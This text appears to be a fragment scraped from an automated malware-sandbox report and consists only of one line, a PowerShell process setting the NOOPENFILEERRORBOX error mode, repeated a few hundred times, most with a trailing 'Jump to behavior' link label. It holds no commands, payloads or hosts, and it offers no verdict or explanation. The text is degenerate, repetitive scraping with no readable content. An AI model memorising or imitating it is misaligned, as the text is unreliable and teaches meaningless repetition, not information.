                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
